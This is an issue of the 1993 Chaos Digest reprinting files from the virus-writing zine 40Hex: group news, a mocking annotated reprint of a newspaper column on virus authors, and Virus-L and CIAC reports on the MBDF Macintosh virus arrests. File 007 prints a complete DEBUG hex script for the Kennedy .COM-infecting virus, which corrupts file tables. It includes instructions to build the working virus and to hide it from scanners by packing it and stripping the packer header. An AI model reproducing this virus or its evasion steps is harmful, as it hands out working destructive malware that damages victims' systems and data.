Copy Link
Add to Bookmark
Report
Chaos Digest Volume 01 Numero 49
Chaos Digest Mercredi 9 Juin 1993 Volume 1 : Numero 49
ISSN 1244-4901
Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere
TABLE DES MATIERES, #1.49 (9 Juin 1993)
File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)
Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST
The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.
Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:
* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.
----------------------------------------------------------------------
Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)
40Hex Number 6 Volume 2 Issue 2 File 005
I'm back, well kind of. Anyways, a lot of people have been
asking, "What's going on with the group?" The question should be, "What's
going on with any group these days?" It seems to me that 1992 was the death
of h/p, or at least the "ice age" of it. Everybody was either getting busted
or quitting the scene. Oh well, what can I say about it. Our group has been
having bad luck too. Five (now six) busted as well as other assorted bad
things happening to members.
Anyways, what's going on with us, huh?. Well the reason you
haven't heard much from us is because we haven't been releasing our new stuff
to BBS systems (BBS system sounds as redundant as PIN number, I know) because
we have a strong feeling that members of such groups as the CVIA are logging
on to h/p boards in the hope of snatching the latest viruses. Well not much
you can do about it if you run a BBS, unless you personnally know everyone
who calls your board. But come to think of it - what good does it prove to
release your newest creation to the general public (of the h/p crowd) via BBS
system? Isn't that the same principle as the warez puppy scene? I guess you
all can do whatever turns you on but we kind of decided that it would be in
our best interests to release our stuff to BBS's only after they have been
detected by the popular scanners or until they are kind of old. Not to fear,
40-HEX and "Dark Angel Phunky Writing Guide" will still be on boards at the
same rate as always.
As for all of you people bitching that no longer have sites
and that we are dead, well your dead - wrong. The current sites are as
follows (in no specific order) - Digital Warfare (yes it's back, at a new
number however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's
back), and the newest addition - Crow Technology. And as for us being dead
yeah right.
** Note from DecimatoR:
The U.S.S.R System recently went down, due to Time Lord getting into a little
hot water. It WILL return however... we're just not sure when. **
** Note from GHeap:
I am coming back, gimme mo' time!
So now with that out of the way, on the other news. Hmmm...
Michelangelo caused quite a scare there for a while. It was pretty cool
to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new
half hour computer talk show on syndicated radio. I'm sure he wouldn't mind
if we got on the show some time soon. Check your local radio guide for your
local station and time... I am offering a standing bounty of $1,500 for the
person willing to fly to Ohio and kick Crow Meisters ass for good. A minor
would be preferred, being that he is under 18 and if I smashed him I could
get sued or something. Just kidding, Crow Meister is cool with me,
hihihihi... A new federal law is being considered which if passed will outlaw
the authorship of computer viruses totally, research or not. Read more about
that later in this issue... Hey, I might have a BBS up soon! I have been
saying that for the past 2 years haven't I? Well that's the news as I see
it, it's nice to be writing for this rag again.
Check ya in 25 to life....
Hellraiser P/S
1992
This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
a disk in place of a fuckin print out...
+++++
40Hex Number 6 Volume 2 Issue 2 File 006
Well, this little news "tid-bit" came from Attitude Adjuster, one of the
few non-PHALCON/SKISM contributers (ok, the ONLY non P/S member), Thanks a
lot dude, keep the submissions coming. The article itself is quite sad,
and makes me question the intelligence of our opposition.
-)GHeap&Demo
Thanx to CZ for THE line.
---------------------------------------------------------------------------
- We need Computer Virus Snitches -
Written By Mike Royko, Tribune Media Services.
Retyped by The Attitude Adjuster
===========================================================================
Millions of computer users are wondering how to protect themselves
against the wave of viruses that are threatening their machines. I have a
suggestion.[So do I, avoid Bnu 1.90Beta]
First, they should remember that these viruses don't spring from
nature. They are little computer programs that are created and sent on
their way by people that are brainy, malicious and arrogant.[I am not
brainy]
So, the question is, how do you find the creators of computer
virus programs?
Because they are arrogant, it's likely that they want someone to
know what a clever thing they have done. They won't hold a press conference
[Actually, we do hold press conferences.See MichaelAlexander@Computerworld]
but chances are they will brag to a trusted friend or acquaintance or
fellow hacker.
It is sad, but the world is full of snitches.[Get a thesaurus] Look
at John Gotti, the nation's biggest Mafia boss. There was a time when it
was unthinkable for even the lowest-level Mafia soldier to blab. But now
Gotti has to sit in court while his former right-hand man tells about how
they got people whacked. [We whack people too]
So if Mafia figures can be persuaded to tattle[Na-na-na-na-na], is
there any reason to believe that nerds have a greater sense of honor and
loyalty? [Yes, we also have brains]
Of course[.] not, but how do you get them to do it?
Money. [Now yer talking... my mom is really the Dark Avenger, I want
my money now.]
These companies [what companies, I only hit hospitals] could use
petty cash to place ads in the computer magazines and on the electronic
bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad
space available]
The ads would say something like: "A $50,000 reward for any
information leading to the arrest and conviction of virus authors."
[How can you convict a virus author. It isn't illegal. Go play Tank Wars.]
The next question would be what to do with the virus makers once
they have been caught. And that's the key to putting an end to the
problem: something that could be posted on those electronic bulletin
boards that might cause an aspiring virus-maker to go take a brisk walk
instead.
A judge would sit and listen to an attorney who would say some-
thing like this:
"Your honor, what we have here is an otherwise fine young man
from a good family. His father is a brilliant scholar, and the son will
someday be the same."[I am going to be a certified scholar when I grow up.]
"What he did was no more than an intellectual prank, a cerebral
challenge of sorts. Like the man who climbed Mount Everest because it was
there, he created the virus and sent it fourth because it was there."
Then, we can hope, the judge might say something like this:
"Yes, I am impressed by the defendant's brain power. And I
expected you to ask me to give him a slap on the wrist."
"However, he is not a child. He is an adult. And I would think
that so brilliant a grown man would know better than to amuse himself
by screwing with the lives of strangers." [I haven't screwed one stranger]
"It's as if he hid inside the businesses and institutions until
they were closed and everyone had gone home. Then he came out and went
through every filing cabinet and drawer and shredded or burned every bit
of useful information he could find."[Cool! Lets try it.]
"Now, counselor, what would you and your law partners say is some
street mope [See Thesaurus] did that to your firm - crept in and destroyed
every document in your offices? Including the names of clients that owe you
money. Hah, you would be in here asking me to hang him from a tree."[I love
hanging from trees]
"So don't give me that smart kid from a good family routine.
[I ain't smart, and family ain't good] He is a self-centered, insensitive,
uncaring, arrogant goofball [And damn proud]. He didn't give a second
thought to the chaos or heartbreak he would cause an adoption agency, a
hardworking businessman or a medical clinic." [Yes I did. I aim for them.]
"Therefore, I sentence him to the maximum sentence the law allows
in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really
terrible place, filled with all sorts of crude, insensitive hulks."
[Jay-walkers]
"Bailiff, please get the defendent up off the floor and administer
some smelling salts."[More like, why is the defendant laughing?]
"And change his trousers, quickly."[Fuck you]
[]comments added by Demogorgon and GHeap
===========================================================================
I hope you enjoyed that one as much as I did! Okay, I
see some really neat things with this man's article. First off,
I'm sure he's an adept programmer... that is, he can probably
figure out how to get his VCR to tape something while he is
off writing his brilliant articles. I enjoy his narrow-minded
definition of virii (that was mentioned in 40Hex 5), of course,
all virii are those evil overwriting, trigger date, resident,
boot track infecting swine (yeah, he probably learned what a
virus was from watching ABC News covering the Michaelangelo
crisis!)
I also enjoy his opinion that all virus authors are
nerds. First off, what the hell is a nerd? I mean, I have
written a virus before (not saying it was any good), but, I
don't feel like a nerd! In fact, I feel quite superior to
most of the idiots like this guy. And, I like his great
statement about my loyalty. Yes, I'm gonna narc on [PHALCON/
[Forget this again, and die]]SKISM for $50,000!!! Yeah, right.
There are a lot of narcs on this not-so good earth, so choose
your friends wisely.
I'm quite sure that ads on BBS's (electronic bulletin
boards! No... cork ones!) would just sufficiently pump up user
discussion of virii. I'm not scared of fed intervention, and
I doubt any authors I know are either.
This was touched on in 40Hex 5, virus authors are not
responsible for the spread of their virii unless they are
actively spreading them! I mean, it's not my fault that K-Rad
Man sent my Hard Drive Blender (slices, dices, minces sectors)
to 1000 Bible boards in Utah. Apparently it hasn't dawned on
this guy that most virii are not written to be destructive.
Actually, that's a lie. There are a lot of virii out there that
are descructive, but that is changing. People like the
PHALCON/SKISM crew realize that not everything must be
destructive, opening the doors to much larger virus projects
(ie Bobisms)
One more thing... QUIT EQUATING THE WORD 'hacker' TO
EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'
I'm gonna get this dude's phone #, I say we call him
sometime...
-The Attitude Adjuster-
+++++
40Hex Number 6 Volume 2 Issue 2 File 007
Lets see what good ole' Patty has to say about this:
Virus Name: Kennedy
Aliases: Dead Kennedy, 333, Kennedy-333
Scan ID: [Kennedy]
V Status: Endangered
Discovered: April, 1990
Symptoms: .COM growth; message on trigger dates (see text);
crosslinking of files; lost clusters; FAT corruption
Origin: Denmark
Eff Length: 333 Bytes
Type Code: PNCKF - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
Novi 1.0.1+, Sweep 2.3.1+, UTScan
Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files
General Comments:
The Kennedy virus was isolated in April 1990. It is a generic
infector of .COM files, including COMMAND.COM.
This virus has three activation dates: June 6 (assassination of
Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
and November 22 (assassination of John F. Kennedy 1963) of any year.
On activation, the virus will display a message the following
message:
"Kennedy is dead - long live 'The Dead Kennedys'"
The following text strings can be found in the viral code:
"\command.com"
"The Dead Kennedys"
Systems infected with the Kennedy virus will experience
cross-linking of files, lost clusters, and file allocation table
errors (including messages that the file allocation table is bad).
--------------------------------Cut Here------------------------------------
n kennedy.com
e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8
e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81
e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74
e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00
e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20
e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89
e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B
e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D
e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33
e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81
e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA
e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8
e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94
e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01
e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C
e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8
e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00
e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43
e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B
e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22
e 0240 54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79
e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
rcx
027F
w
q
---------------------------------Cut Here-----------------------------------
Ok there it is. Not the most impressive virus around and its caught by just
about every scan on the market, but take PKLite to it and then remove the
PKLite header (Use NOLITE in this issue) and no one will be able to find it.
Anyway it gets the job done.
To make the above hex into a working file, first cut on the dotted lines.
Name the resulting file KENNEDY.TXT.
Then: DEBUG < KENNEDY.TXT and you'll have a working virus.
-Instigator
+++++
40Hex Number 6 Volume 2 Issue 2 File 008
Take a look at this. I picked it up on fidonet, originally from Virus-L
digest. all the stuff in *< >*'s are my comments.
- Demogorgon
------------------------------
VIRUS-L Digest Wednesday, 26 Feb 1992 Volume 5 : Issue 44
------------------------------
Date: Tue, 25 Feb 92 10:10:14 -0500
>From: mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: MBDF Suspects Arrested (Mac)
The Cornell Daily Sun reported in this morning's issue that two
Cornell University sophomores, David Blumenthal and Mark Pilgrim, were
arrested Monday evening and arraigned in Ithaca City Court on one
count each of second degree computer tampering, in connection with the
release of the MBDF virus that infected Macs worldwide over the last
several days. The two are being held in Tompkins County Jail.
*< huh? How does one get arrested for spreading a virus, you ask? read on >*
Further charges are pending.
---
** many lines of mail routing crap have been deleted **
Date: Tue, 25 Feb 1992 11:47:32 PST
>From: lipa@camis.stanford.edu (Bill Lipa)
Subject: Alleged MBDF virus-creators arrested at Cornell
"Computer Virus Traced to Cornell Students"
by Jeff Carmona
[The Cornell Daily Sun, 25 February 1992]
Two Cornell students were arrested yesterday for allegedly creating and
launching *< launching ? Bon voyage, we launched you !>* a computer virus
that crippled computers around the world, according to M. Stuart Lynn, the
University's vice president for information technologies.
David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
Public Safety officers and arraigned in Ithaca City Court on one count of
second-degree computer tampering, a misdemeanor, *< cool, its only a
misdemeanor, how bad could it be ? >* Lynn said.
Both students were remanded to the Tompkins County Jail and remained in
custody early this morning. They are being held on $2,000 cash or $10,000
bail bond, officials said.
Cornell received national attention in Nov. 1988 when Robert T. Morris
Jr., a former graduate student, was accused of unleashing a computer virus
into thousands of government and university computers.
Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined
$10,000, given a three-year probation and ordered to do 400 hours of
community service by a federal judge in Syracuse, according to Linda Grace-
Kobas, *< Whats a Koba?? >* director of the Cornell News Service.
Lynn would not compare the severity of the current case with Morris',
saying that "each case is different."
Lynn said the virus, called "MBDFA" was put into three Macintosh games --
Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle.
On Feb. 14, the games were launched from Cornell to a public archive at
Stanford University in Palo Alto, Calif, Lynn said.
*< I guess these guys actually put it up on the archive under their own >*
*< accounts! Don't they know they can trace that stuff? duhhh... >*
>From there, the virus spread to computers in Osaka, Japan and elsewhere
around the world *< the archive was a dumb idea if thats how they got caught,
but it spread like hell >* when users connected to computer networks via
modems, he added. It is not known how many computers the virus has affected
worldwide, he explained.
When computer users downloaded the infected games, the virus caused "a
modification of system software," *< oooh...lets not get too technical >* Lynn
said. "This resulted in unusual behavior and system crashes," he added.
Lynn said he was not aware of anyone at Cornell who reported finding the
virus on their computers.
The virus was traced to Cornell last Friday, authorities were quickly
notified and an investigation began, Lynn said.
"We absolutely deplore this kind of bahavior," Lynn said. "We will pursue
this matter to the fullest."
Armed with search warrants, Public Safety investigators removed more than
a dozen crates full of evidence from the students' residences in Baker and
Founders halls on West Campus. *< sounds like a typical, over-kill bust to
me. If you don't know what it is, take it. >*
Public Safety officials refused to disclose the contents of the crates or
issue any comment about the incident when contacted repeatedly by phone last
night. *< thats because they don't know what the fuck the stuff is >*
"We believe this was dealt with very quickly and professionally," Lynn
said.
The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today
and additional charges are pending, according to Grace-Kobas.
Because spreading a computer virus violates federal laws, "conceivably,
the FBI could be involved," she added. Officials with the FBI could not be
reached to confirm or deny this.
Blumenthal and Pilgrim, both 19-year-olds, were current student employees
at Cornell Information Technologies (CIT), Lynn said. He would not say
whether the students launched the virus from their residence hall rooms or
>From a CIT office.
Henrik N. Dullea '61, vice president for University relations, said he
thinks "the act will immediately be associated with the University," not
only with the individual students charged.
Because a major virus originated from a Cornell student in the past, this
latest incident may again "bring a negative reaction to the entire
institution," Dullea said. *< "blah, blah, blah" >*
"These are very selfish acts," Lynn said, referring to the intentional
distribution of computer viruses, because innocent people are harmed.
Lynn said he was unaware of the students' motive for initiating the virus.
Lynn said CIT put out a notice yesterday to inform computer users about the
"very virulent" virus. A virus-protection program, such as the new version of
Disinfectant, can usually cure computers, but it may be necessary to "rebuild
the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your-
hard-drive" !>* in some cases, he added.
A former roommate of Blumenthal said he was not surprised by news of the
arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
'95, his roommate from last semester. "He was in front of the computer all
day," Fuller said.
Blumenthal, who had a modem, would "play around with viruses because they
were a challenge to him," Fuller said. He said that, to his knowledge,
Blumenthal had never released a virus before.
-->-<------ Cut Here --------------------------
------------------------------
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
------------------------------
Date: Wed, 26 Feb 92 11:08:45 -0800
>From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)
NO RESTRICTIONS
_____________________________________________________
The Computer Incident Advisory Capability
___ __ __ _ ___
/ | / \ /
\___ __|__ /___\ \___
_____________________________________________________
INFORMATION BULLETIN
New Virus on Macintosh Computers: MBDF A
February 25, 1992, 1130 PST Number C-17
________________________________________________________________________
NAME: MBDF A virus
PLATFORM: Macintosh computers-except MacPlus and SE (see below)
DAMAGE: May cause program crashes
SYMPTOMS: Claris applications indicate they have been altered; some
shareware may not work, unexplained system crashes
DETECTION &
ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6,
VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
________________________________________________________________________
Critical Facts about MBDF A
A new Macintosh virus, MBDF A, (named for the resource it exploits)
has been discovered. This virus does not appear to maliciously cause
damage, but simply copies itself from one application to another.
MBDF A was discovered at two archive sites in newly posted game
applications, and has a high potential to be very widespread.
Infection Mechanism
This virus is an "implied loader" virus, and it works in a similar
manner to other implied loader viruses such as CDEF and MDEF. Once
the virus is active, clean appliacation programs will become infected
as soon as they are executed. MBDF A infects only applications, and
does not affect data files. This virus replicates under both System 6
and System 7. While MBDF A may be present on ALL types of Macintosh
systems, it will not spread if the infected system is a MacPlus or a
Mac SE (although it does spread on an SE/30).
Potential Damage
The MBDF A virus has no malicious damaging characteristics, however,
it may cause programs to inexplicably crash when an item is selected
from the menu bar. Some programs, such as the shareware
"BeHierarchic" program, have been reported to not operate correctly
when infected. Applications written with self-checking code, such as
those written by the Claris corporation, will inform the user that
they have been altered.
When MBDF A infects the system file, it must re-write the entire
system file back to disk; this process may take two or three minutes.
If the user assumes the system has hung, and reboots the Macintosh
while this is occuring, the entire system file will be corrupted and
an entire reload of system software must then be performed.
This virus can be safely eradicated from most infected programs,
although CIAC recommends that you restore all infected files from an
uninfected backup.
------------------------------
End of Chaos Digest #1.49
************************************